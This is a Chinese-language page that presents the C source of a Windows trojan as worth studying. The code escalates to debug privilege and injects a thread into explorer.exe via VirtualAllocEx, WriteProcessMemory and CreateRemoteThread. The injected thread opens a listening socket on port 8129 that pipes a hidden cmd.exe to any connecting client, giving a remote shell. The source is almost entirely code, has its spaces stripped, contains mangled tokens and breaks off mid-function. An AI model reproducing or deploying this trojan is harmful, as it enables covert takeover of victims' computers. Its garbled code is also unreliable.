C语言木马源码

语言木马源码很值得研究#include<winsock2.h>#pragmacomment(lib,"ws2_32.lib")#include<windows.h>#include<Shlwapi.h>#pragmacomment(lib,"Shlwapi.lib")#include<tlhelp32.h>#include<stdio.h>#include<string.h>参数结构;typedef struct _RemotePara{DWORDdwLoadLibrary;DWORDdwFreeLibrary;DWORDdwGetProcAddress;DWORDdwGetModuleHandle;DWORDdwWSAStartup;DWORDdwSocket;DWORDdwhtons;DWORDdwbind;DWORDdwlisten;DWORDdwaccept;DWORDdwsend;DWORDdwrecv;DWORDdwclosesocket;DWORDdwCreateProcessA;DWORDdwPeekNamedPipe;DWORDdwWriteFile;DWORDdwReadFile;DWORDdwCloseHandle;DWORDdwCreatePipe;DWORDdwTerminateProcess;DWORDdwMessageBox;charstrMessageBox[12];charwinsockDll[16];charcmd[10];精选文库charBuff[4096];chartelnetmsg[60];}RemotePara;提升应用级调试权限BOOLEnablePrivilege( HANDLEhToken,LPCTSTRszPrivName,BOOLfEnable);根据进程名称得到进程IDDWORDGetPidByName(char*szName);远程线程执行体DWORD__stdcall ThreadProc(RemotePara*Para){WSADATAWSAData;WORDnVersion;SOCKETlistenSocket;SOCKETclientSocket;struct sockaddr_in server_addr;struct sockaddr_in client_addr;int iAddrSize= sizeof(client_addr);SECURITY_ATTRIBUTESsa;HANDLEhReadPipe1;HANDLEhWritePipe1;HANDLEhReadPipe2;HANDLEhWritePipe2;STARTUPINFOsi;PROCESS_INFORMATIONProcessInformation;unsigned longlBytesRead=0;typedefHINSTANCE(__stdcall*PLoadLibrary)(char*);typedefFARPROC(__stdcall*PGetProcAddress)(HMODULE,LPCSTR);typedefHINSTANCE(__stdcall*PFreeLibrary)(HINSTANCE);typedefHINSTANCE(__stdcall*PGetModuleHandle)(HMODULE);FARPROCPMessageBoxA;FARPROCPWSAStartup;FARPROCPSocket;FARPROCPhtons;FARPROCPbind;— 2精选文库FARPROCPlisten;FARPROCPaccept;FARPROCPsend;FARPROCPrecv;FARPROCPclosesocket;FARPROCPCreateProcessA;FARPROCPPeekNamedPipe;FARPROCPWriteFile;FARPROCPReadFile;FARPROCPCloseHandle;FARPROCPCreatePipe;FARPROCPTerminateProcess;PLoadLibrary LoadLibraryFunc=( PLoadLibrary)Para->dwLoadLibrary;PGetProcAddressGetProcAddressFunc=( PGetProcAddress)Para->dwGetProcAddress;PFreeLibrary FreeLibraryFunc=( PFreeLibrary )Para->dwFreeLibrary;PGetModuleHandleGetModuleHandleFunc=( PGetModuleHandle)Para->dwGetModuleHandle;LoadLibraryFunc( Para->winsockDll);PWSAStartup=(FARPROC)Para->dwWSAStartup;PSocket=(FARPROC)Para->dwSocket;Phtons=(FARPROC)Para->dwhtons;Pbind=(FARPROC)Para->dwbind;Plisten=(FARPROC)Para->dwlisten;Paccept=(FARPROC)Para->dwaccept;Psend=(FARPROC)Para->dwsend;Precv=(FARPROC)Para->dwrecv;Pclosesocket=(FARPROC)Para->dwclosesocket;PCreateProcessA=(FARPROC)Para->dwCreateProcessA;PPeekNamedPipe=(FARPROC)Para->dwPeekNamedPipe;PWriteFile=(FARPROC)Para->dwWriteFile;PReadFile=(FARPROC)Para->dwReadFile;PCloseHandle=(FARPROC)Para->dwCloseHandle;PCreatePipe=(FARPROC)Para->dwCreatePipe;PTerminateProcess=(FARPROC)Para->dwTerminateProcess;PMessageBoxA=(FARPROC)Para->dwMessageBox;nVersion=MAKEWORD(2,1);PWSAStartup(nVersion,(LPWSADATA)&WSAData);listenSocket=PSocket(AF_INET,SOCK_STREAM,0);if(listenSocket==INVALID_SOCKET)return0;server_addr.sin_family=AF_INET;— 3精选文库server_addr.sin_port =Phtons(( unsigned short)(8129));server_addr.sin_addr. s_addr=INADDR_ANY;if(Pbind(listenSocket,( struct sockaddr*)&server_addr, sizeof(SOCKADDR_))IN!=0)return 0;if(Plisten(listenSocket,5)) return 0;clientSocket=Paccept(listenSocket,( struct sockaddr*)&client_addr,&iAddrSize);//Psend(clientSocket,Para->telnetmsg,60,0);if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0)) return 0;if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0)) return 0;ZeroMemory(&si,sizeof(si));//ZeroMemory是C运行库函数，可以直接调用si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;si.wShowWindow=SW_HIDE;si.hStdInput =hReadPipe2;si.hStdOutput =si.hStdError=hWritePipe1;if(!PCreateProcessA( NULL,Para->cmd,NULL,NULL,1,0, NULL,NULL,&si,&ProcessInformation))return 0;while(1){memset(Para->Buff,0,4096);PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0);if(lBytesRead){if(!PReadFile(hReadPipe1, Para->Buff,lBytesRead,&lBytesRead,0)) break;if(!Psend(clientSocket, Para->Buff,lBytesRead,0)) break;}else{lBytesRead=Precv(clientSocket, Para->Buff,4096,0);if(lBytesRead<=0) break;if(!PWriteFile(hWritePipe2, Para->Buff,lBytesRead,&lBytesRead,0)) break;}}PCloseHandle(hWritePipe2);PCloseHandle(hReadPipe1);PCloseHandle(hReadPipe2);PCloseHandle(hWritePipe1);Pclosesocket(listenSocket);Pclosesocket(clientSocket);PMessageBoxA(NULL,Para->strMessageBox,Para->strMessageBox,MB_OK);return0;}— 4精选文库int APIENTRYWinMain(HINSTANCEhInstance,HINSTANCEhPrevInstance,LPSTRlpCmdLine,int nCmdShow){const DWORDTHREADSIZE=1024*4;DWORDbyte_write;void*pRemoteThread;HANDLEhToken,hRemoteProcess,hThread;HINSTANCEhKernel,hUser32,hSock;RemoteParamyRemotePara,*pRemotePara;DWORDpID;OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);获得指定进程句柄，并设其权限为PROCESS_ALL_ACCESSpID=GetPidByName("EXPLORER.EXE");if(pID==0)return0;hRemoteProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);if(!hRemoteProcess)return0;在远程进程地址空间分配虚拟内存pRemoteThread=VirtualAllocEx(hRemoteProcess,0,THREADSIZE, MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);if(!pRemoteThread)return 0;将线程执行体ThreadProc写入远程进程if(!WriteProcessMemory(hRemoteProcess,pRemoteThread,&ThreadProc,THREADSIZE,0))return0;ZeroMemory(&myRemotePara,sizeof(RemotePara));hKernel=LoadLibrary("kernel32.dll");myRemotePara.dwLoadLibrary=(DWORD)GetProcAddress(hKernel,"LoadLibraryA");myRemotePara.dwFreeLibrary=(DWORD)GetProcAddress(hKernel,"FreeLibrary");myRemotePara.dwGetProcAddress=(DWORD)GetProcAddress(hKernel,"GetProcAddress");myRemotePara.dwGetModuleHandle=(DWORD)GetProcAddress(hKernel,"GetModuleHandleA");myRemotePara.dwCreateProcessA=(DWORD)GetProcAddress(hKernel, "CreateProcessA" );myRemotePara.dwPeekNamedPipe =(DWORD)GetProcAddress(hKernel, "PeekNamedPipe");myRemotePara.dwWriteFile =( DWORD)GetProcAddress(hKernel, "WriteFile" );myRemotePara.dwReadFile =( DWORD)GetProcAddress(hKernel, "ReadFile");— 5精选文库myRemotePara.dwCloseHandle=(DWORD)GetProcAddress(hKernel,"CloseHandle");myRemotePara.dwCreatePipe=(DWORD)GetProcAddress(hKernel,"CreatePipe");myRemotePara.dwTerminateProcess=(DWORD)GetProcAddress(hKernel,"TerminateProcess");hSock=LoadLibrary("wsock32.dll");myRemotePara.dwWSAStartup=(DWORD)GetProcAddress(hSock,"WSAStartup");myRemotePara.dwSocket=(DWORD)GetProcAddress(hSock,"socket");myRemotePara.dwhtons=(DWORD)GetProcAddress(hSock,"htons");myRemotePara.dwbind=(DWORD)GetProcAddress(hSock,"bind");myRemotePara.dwlisten=(DWORD)GetProcAddress(hSock,"listen");myRemotePara.dwaccept=(DWORD)GetProcAddress(hSock,"accept");myRemotePara.dwrecv=(DWORD)GetProcAddress(hSock,"recv");myRemotePara.dwsend=(DWORD)GetProcAddress(hSock,"send");myRemotePara.dwclosesocket =( DWORD)GetProcAddress(hSock, "closesocket" );hUser32= LoadLibrary ("user32.dll" );myRemotePara.dwMessageBox=(DWORD)GetProcAddress(hUser32, "MessageBoxA");strcat(myRemotePara.strMessageBox, "Sucess!//0" );strcat(myRemotePara.winsockDll, "wsock32.dll//0" );strcat(myRemotePara.cmd, "cmd.exe//0" );strcat(myRemotePara.telnetmsg, "ConnectSucessful!//n//0" );写进目标进程pRemotePara=(RemotePara*)VirtualAllocEx(hRemoteProcess,0, sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);if(!pRemotePara)return 0;if(!WriteProcessMemory(hRemoteProcess,pRemotePara,&myRemotePara, sizeofmyRemotePara,0))return 0;// 启动线程hThread=CreateRemoteThread(hRemoteProcess,0,0,( DWORD(__stdcall *)( void*))pRemoteThread,pRemotePara,0,&byte_write);while(1){}FreeLibrary(hKernel);FreeLibrary(hSock);FreeLibrary(hUser32);CloseHandle(hRemoteProcess);CloseHandle(hToken);return 0;}— 6精选文库BOOLEnablePrivilege( HANDLEhToken,LPCTSTRszPri